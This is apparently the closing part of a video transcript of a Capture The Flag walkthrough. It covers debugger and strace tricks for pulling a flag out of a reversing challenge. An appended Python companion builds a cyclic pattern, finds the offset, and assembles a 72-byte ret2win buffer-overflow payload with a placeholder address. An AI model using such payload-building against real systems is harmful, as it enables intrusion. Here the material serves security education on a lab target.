client and okay now we need to run it with that server and port number let me just get that so we're going to run we're going to give it a server address and port number uh we've just got there untrusted client location so this didn't happen whenever we ran this locally right we didn't get this message so we can see that it's actually got through to this section of code in here and this is what's going to be of interest to us so if we can set a breakpoint up around here remember this was let me go back and get that function address uh one seven five three so we can say here break rva zero x one seven five three it's not gonna let us because the program's currently not being run so can we break and we can't break it mean either let's do break uh maybe it's star i okay that starts at the first instruction and then we can do our break rva we'll hit continue we hit our break point and that's the start of this function which is about to be called and then i basically just stepped through here so we can step through next next and we can keep going and have a look to see what's in these registers and stuff maybe you want to print some of them out and see what's in there but what i'm interested in is this receive it's going to call receive again and we know the send in the receive is sending and receiving stuff from the client to the server so let's go down to receive and okay you can see what's been set up here this is a socket that's being set up a buffer we want to see what's actually retrieved so next one more time and we get back our flag not quite so opaque so the flag has been retrieved to the stack and by setting up a break point there in the application where we were able to retrieve it we could now go and say x x over s r s p we can print out the flag and just take a copy of it and go and submit that another way we could have actually done that is to run the same thing say netcat we'll do s trace pass in the binary server and port number and we run that and s 
trace will also retrieve the flag for us this is kind of like running the l trace as well but l trace doesn't come back with all the information there that we would uh need so yeah we can do that with a debugger or we can do it with s trace uh quite an easy challenge i guess considering how long it took me to solve it i mostly blame the docker not knowing about the docker for that but i guess it's not the only thing to blame um but anyway we've got all five challenges done day one complete uh let's just go over again so in terms of the solves at the moment we've got one and a half thousand for baby apt forensics which was obviously the easiest challenge second place was web with 621 at the moment and then crypto with 427 and then phone with 325 and reverse him with 340. okay reverse has actually gone up now that's good um yeah but that'll wrap it up this video and hopefully we'll get some more challenges done over the next few days i'm not sure if i'll be able to get every day done but let's see if you have any questions or comments so you solved any challenges differently using cool tricks you want to let me know about and just leave a comment below thanks
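Added example, not the video's exploit.py and not pwntools code: the Mr Snowy offset-finding and payload-building steps from the walkthrough, done in plain Python without pwntools. It generates the same de Bruijn pattern as cyclic, looks up the saaataaa value seen at RSP (what cyclic -l does), checks why a 64-bit crash leaves that value on the stack rather than in RIP (it is not a canonical address), and packs the 72-byte ret2win payload. The deactivate_camera address is a constructed placeholder; the real one comes from the binary.

```python
"""Constructed walkthrough companion: cyclic pattern, offset lookup, payload."""
import itertools
import string
import struct
from typing import Iterator

ALPHABET = string.ascii_lowercase  # same default alphabet as pwntools' cyclic
N = 4                              # same default subsequence length as cyclic

# Constructed placeholder: NOT the real address of deactivate_camera.
DEACTIVATE_CAMERA = 0x401234


def de_bruijn(alphabet: str = ALPHABET, n: int = N) -> Iterator[str]:
    """Lazily yield the de Bruijn sequence B(k, n). Every length-n string over
    the alphabet occurs exactly once, so any n-byte window maps to one offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int) -> Iterator[str]:
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int) -> bytes:
    """Equivalent of `cyclic 500`: the first `length` bytes of the pattern."""
    return "".join(itertools.islice(de_bruijn(), length)).encode()


def cyclic_find(value: bytes, max_len: int = 4096) -> int:
    """Equivalent of `cyclic -l saaataaa`: offset of `value` in the pattern.
    Only the first N bytes are needed to identify the position; -1 if absent."""
    return cyclic(max_len).find(value[:N])


def is_canonical(addr: int) -> bool:
    """x86-64 user/kernel addresses must be canonical: bits 63..47 all equal.
    0x6161617461616173 ('saaataaa' little-endian) is not, so the CPU faults on
    the ret instead of loading it into RIP; pwndbg then shows it at RSP."""
    top = addr >> 47
    return top == 0 or top == (1 << 17) - 1


def build_payload(offset: int, ret_addr: int) -> bytes:
    """What flat({offset: ret_addr}) does for a 64-bit little-endian target:
    padding up to the saved return address, then the address to return into."""
    return b"A" * offset + struct.pack("<Q", ret_addr)


if __name__ == "__main__":
    crash_value = b"saaataaa"            # the value pwndbg showed at RSP
    offset = cyclic_find(crash_value)    # 72, as in the video
    as_int = struct.unpack("<Q", crash_value)[0]
    print(f"offset={offset} crash_value=0x{as_int:x} canonical={is_canonical(as_int)}")
    payload = build_payload(offset, DEACTIVATE_CAMERA)
    print(f"payload ({len(payload)} bytes): {payload!r}")
```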
Info
Channel: CryptoCat
Views: 4,476
Keywords: Cyber Santa, HackTheBox, Hack The Box, HTB, Capture The Flag, CTF, base64, PCAP, Wireshark, traffic analysis, APT, XSS, puppeteer, steal cookie, RSA, common modulus, RsaCTFTool, buffer overflow, ret2win, binary exploitation, pwn, exploit, pwntools, pwndbg, GDB, checksec, canary, PIE, GOT, libc, python, strace, ltrace, debugging, static analyis, dynamic analysis, offsec, radare, r2, crypto, reversing, forensics, DFIR, ethical hacking, web exploit, pentesting, pen-test, bug bounty, writeup, cyberchef, GCHQ, NSA, IDA, xmas
Id: 20FkOdoMiRU
Length: 57min 24sec (3444 seconds)
Published: Sun Dec 05 2021